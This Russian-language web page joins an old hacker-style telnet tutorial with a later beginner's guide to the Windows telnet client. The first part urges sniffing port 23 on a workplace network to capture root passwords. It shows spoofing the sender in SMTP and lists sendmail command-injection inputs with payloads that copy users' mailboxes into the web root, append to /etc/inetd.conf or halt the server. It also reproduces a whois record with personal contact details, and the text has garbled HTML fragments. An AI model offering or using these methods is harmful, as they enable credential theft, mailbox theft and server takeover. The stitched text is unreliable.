Часть первая. Хочу но не
могу.

Зачастую меня спрашивают ,
«Как типа телнет поюзать?» Гммм, ну начнем с
того что «телнет» в привычном понимании — 
это всего лишь терминал ,который позволяет
несчастному юзеру  стать клиентом
какого-нибудь сервиса завязанного на TCP/IP.
Соответственно, для начала нужно определиться
,куда нам нужно)) и нужно ли
нам это… Часто задаваемый вопрос номер два , а
где мне взять телнет клиента(терминал)? Ну
большинство начинающих странников (от слова
странный) даже не догадываются о том ,что телнет
клиент уже стоит на машине))) вызовите командную
строку дос и наберите там telnet (при условии ,что вы
уже подключены в сеть). Добрый windows порадует вас
на редкость кривым клиентом, не имеющим
возможности  настройки типа терминала.Гораздо
более приятно пользоваться универсальным
клиентом SecureCRT (http://www.vandyke.com).Если
у тебя стоит Linux или BSD ,то ты уже достиг
могущества и тебе осталось в X`ах вызвать консоль
и набрать telnet.


r /> Коннект производится так:
telnet hostname/IP port
Где hostname/IP — имя хоста/IP на который ты решил
повеситься, port — номер порта, через который ты
собрался иметь удаленную систему.

Часть Вторая. Безвозвратно
погибшее прошлое.

Итак для чего изачально был
нужен этот чудо терминал? Для коннекта на порт 23,
который использует UNIX telnetd ,то бишь телнетный
демон. В результате ,после ввода имени
пользователя и пароля ты вываливаешся прямо в shell
и можешь управлять(с правами назначенными тебе
админом) удаленной машиной так же , как будто ты
сидишь непосредственно за ней))). Но в сем сервисе
было столько багов , что умные люди его давно
пофиксили и перешли на SSH. Основная проблема в
том, что юзер, нюхающий траффик в локалке по 23
порту может без проблем прочитать админовские
login&password (никакого шифрования) сплошной plain text.
БРРРРРР. Но если ты ,находясь в локальной сети
своей организации, набрал telnet servername и увидел
нечто типа:
Linux RedHat 6.0
login
Значит ты теперь можешь смело включать сниффер
на 23 порт и ловить пакетики)) Ну за один рабочий
день ты наверняка получишь рутовый логин и
пароль)))


Часть Третья. SendMail
зачастую все еще дыряв.

Гммм. Ну нафига нам сперся 23
порт )))? Попробуем поиметь через 25, то бишь sendmail.
Выглядит это примерно так:

telnet hostname 25
Trying 194.68.13.231…
Connected to gwx3.host.ru.
Escape character is ‘^]’.
220 gwx3.host.ru ESMTP Sendmail 8.9.3/8.9.3; Tue, 1 Aug 2000 08:54:59 +0400
УРА ты повесился напрямую на 25 порт что дальше?
Дальше поздороваемся:
HELO domainname.com
(кстати имя домена может быть любое, но
желательно реально существующее к примеру YAHOO.COM)
далее пишем от кого письмо:
mail from : billgates@microsoft.com
— вот тебе и анонимность ….)))
теперь кому:
rcpt to : username
username — имя юзера которому шлем мыло, root — есть
всегда)))))
ну теперь сама мессага:
data — жмем Enter
здесь печатаем текст .
для того чтобы закончить послание ставим .(точку)
и жмем Enter
quit — валим отсюда))

ВСЕ!!! мы только что отправили
вполне анонимное мыло без всяких там клиентов)))
Радость в том ,что , зачастую, в sendmail есть
следующие баги:
1.


m>mail from : sendername|any_command_as_U_want  — возможность
выполнения любой UNIX команды
rcpt to : username|any_command_as_U_want — возможность
выполнения любой UNIX команды
2. rcpt to : /any_directory/any_filename — возможность
направить мессагу напрямую в файл)))
Один гражданин ,назвавший себя VIRUSMAN недавно
прислал письмо где был следующий вопрос:
«А что мне это дает?» Ну что я могу сказать
………
В первом случае можно сделать нечто типа:
/bin/ls /var/spool/mail>/home/httpd/html/users_info.txt — получаем
список почтовых юзерей
/bin/cat /var/spool/mail/username>/home/httpd/html/user_box.txt
получаем контент ящика юзера.
/bin/echo any_commands_here>>/etc/inetd.conf — добавляем
произвольные команды в конец инет демона)).
/sbin/halt — паркуем сервак))) и т.д….

Во втором случае …)))
Ну попробуй подумать, пиши что хочешь и куда
хочешь))) Можно дописать произвольные команды
скажем в /etc/inetd.conf … все зависит от твоей
фантазии.

Часть четвертая,
прикладная пауза.


Ты конечно уже юзал проги
которые определят провайдера по IP)) Срочно сотри
их, больше никогда не юзай — вспомни про http://www.ripe.net.

На RIPE.NET запросы делаются так:
telnet whois.ripe.net 43
Trying 193.0.0.129…
Connected to whois.ripe.net.
Escape character is ‘^]’.
194.87.0.50
— пишем айпишник и получаем подробную
инфу кто это и откуда.
% Rights restricted by copyright.
See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:     194.87.0.0 — 194.87.3.255
netname:     DEMOS-CORP
descr:       DEMOS Corporate Network
descr:       Demos Plus Co. Ltd.
descr:       Moscow, Russia
country:     RU
admin-c:     PA75
tech-c:      ED12-RIPE
tech-c:      GB90-RIPE
tech-c:      GK41-RIPE
status:      ASSIGNED PA
mnt-by:      AS2578-MNT
changed:     eugen@demos.net
19970313
changed:     galka@demos.net
19990804
source:      RIPE

route:       194.87.0.0/19
descr:       DEMOS
origin:      AS2578
notify:      noc@demos.net
mnt-by:      AS2578-MNT
changed:     eugen@demos.net
19970627
source:      RIPE

person:      Paul Antonov
address:     Demos Plus Ltd.
address:     Ovchinnikovskaya nab. 6/1
address:     Moscow 113035
address:     Russia
phone:       +7 095 9566233
phone:       +7 095 9566234
fax-no:      +7 095 9565042
e-mail:      apg@demos.net
nic-hdl:     PA75
changed:     apg@demos.net 19960618
source:      RIPE


person:      Evgeny R Didenko
address:     Demos-Internet JSC
address:     6-1 Ovchinnikovskaya nab.
address:     Moscow 113035
address:     Russia
phone:       +7 095 737-0436
phone:       +7 095 737-0400
fax-no:      +7 095 233 5016
e-mail:      eugen@demos.net
nic-hdl:     ED12-RIPE
notify:      eugen@demos.net
changed:     eugen@demos.net
19960415
changed:     eugen@demos.net
19991230
source:      RIPE

person:      Gera V Bragin
address:     Demos Company Ltd.
address:     6-1 Ovchinnikovskaya nab.
address:     Moscow 113035
address:     Russia
phone:       +7 095 737 0436
phone:       +7 095 737 0400
fax-no:      +7 095 956 5042
e-mail:      gera@demos.net
nic-hdl:     GB90-RIPE
notify:      gera@demos.net
changed:     gera@demos.net
19970105
changed:     galka@demos.net
19991104
source:      RIPE

person:      Galina Kovalenko
address:     Genesys Telecommunications Lab.
address:     11, 2nd Obydenskiy pereulok
address:     Moscow 119034
address:     Russia
phone:       +7 095 255 7940
fax-no:      +7 095 255 7941
e-mail:      galka@genesyslab.ru
nic-hdl:     GK41-RIPE
remarks:     +7 095 255 7940 ext 2051
notify:      galka@genesyslab.ru
changed:     galka@genesyslab.ru
20000731
source:      RIPE
Connection closed by foreign host.

Сетевой протокол и текстовый интерфейс


TELNET — это средство связи, которое устанавливает транспортное соединение между терминальными устройствами, клиентами, то есть вашим компьютером и чьей-то ещё машиной, сервером, поддерживающей этот стандарт соединения. Это не специальная программа, а всего лишь сетевой протокол, но также словом TELNET (terminalnetwork) называют различные утилиты, которые также используют этот протокол. Сегодня Телнет присутствует практически везде, все ОС, так или иначе, его используют, в том числе и Windows.

TELNET реализует текстовый интерфейс, который отличается от привычного рядовому пользователю графического тем, что все команды необходимо вбивать вручную.

Что нам всё это даёт?

Ранее эта служба была одним из немногих способов подключения к сети, но с течением времени утратила свою актуальность. Сегодня есть гораздо более удобные программы, которые делают за пользователя всю работу, и не заставляют его заучивать наизусть различные команды для того, чтобы выполнить простейшие действия. Однако кое-что при помощи Телнет можно сделать и сейчас.

При помощи Телнет вы можете:


  • подключаться к удалённым компьютерам;
  • проверить порт на наличие доступа;
  • использовать приложения, которые доступны только на удалённых машинах;
  • использовать различные каталоги, к которым получить доступ можно только таким образом;
  • отправлять электронные письма без использования специальных программ (клиентов);
  • понимать суть работы многих протоколов, использующихся сегодня, и извлекать из этого для себя определённую выгоду;
  • обеспечивать другим юзерам доступ к данным, размещённым на своём компьютере.

Начинаем пользоваться

Запуск

Запустить TELNET на Windows 7 и на любой другой Винде достаточно просто. Для этого необходимо сначала клиент, если он ещё не установлен:

  • Зайти в Панель управления.

Панель управления

  • Выбрать пункт «Программы».
  • Выбрать вкладку «Включение или отключение компонентов Windows».

Компоненты Windows

  • Найти Telnet-клиент и поставить напротив него маркер, если он ещё не установлен.

После нажимаем «ОК» и ждём минуту, пока клиент устанавливается.

Запуск терминала осуществляется в Windows через командную строку, если у вас не установлено каких-либо специальных утилит для работы с Телнет. Но раз вы читаете эту статью, значит, только начинаете знакомство с этой темой, и для начала неплохо бы было освоить основы управления при помощи командной строки.

  1. Запускаем командную строку от имени администратора.
  2. Вводим «telnet».

Командная строка перезагружается, и теперь откроется командная линия TELNET, в которой мы и будем работать.

Проверяем порт

Одно из простейших действий, выполняемых в TELNET — проверка порта. Вы можете проверить порт на наличие доступа к нему с вашего компьютера. Для этого нужно сделать следующее:

В командной строке, открытой по методу выше вводим: telnetip-адрес номер порта

Telnet IP адрес

К примеру, если ваш IP-адрес 192.168.0.1, а номер порта 21 (порт FTP), то вводим:

telnet 192.168.0.1 21

Если команда выдаёт сообщение об ошибке, значит, порт недоступен. Если появляется пустое окно или просьба ввести дополнительные данные, значит, порт открыт. Для Windows такой способ проверить порт может быть достаточно удобным.

Команды

Команды TELNET составляют основу использования терминала. С их помощью можно управлять компьютером, который использует этот протокол, если для вас разрешён доступ, а также совершать другие различные действия. Как уже сказано выше, на Windowsони вводятся в командной строке приложения Телнет.

Для того чтобы увидеть основной список команд, введите в строке helpи нажмите «Enter». Базовые команды:


  1. Open — подключение к удалённому серверу. Необходимо ввести эту команду вместе с именем управляемого сервера и номером порта, например: openredmond 44. Если параметры не указаны, то используются локальный сервер и порт по умолчанию.
  2. Close — отключение от удалённого сервера. Используются аналогичные параметры.
  3. Set — настройка удалённого сервера, используется с именем управляемого сервера. Вместе с Set используются следующие команды:
    1. [Term {терминал}] — используется, чтобы задавать терминал указанного типа.
    2. [Escapeсимвол] — задаёт управляющий символ.
    3. [Mode {console или stream}] — задаёт режим работы.
  4. Unset [параметр] — отключает заданный ранее параметр.
  5. Start — запускает сервер Телнет.
  6. Pause — ставит работу сервера на паузу.
  7. Continue — возобновляет работу.
  8. Stop — останавливает сервер.


TELNET — один из старейших протоколов, но при этом он до сих пор применяется. Это означает, что и вы можете начать использовать его в своих целях. Для этого нужно лишь изучить синтаксис и список команд и начать практиковаться. Вы можете почерпнуть много нового, а заодно совсем по-другому начать смотреть на интернет и на привычные ранее действия в сети.

Основные команды telnet и особенности утилиты удалённого доступа

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.

Adblock
detector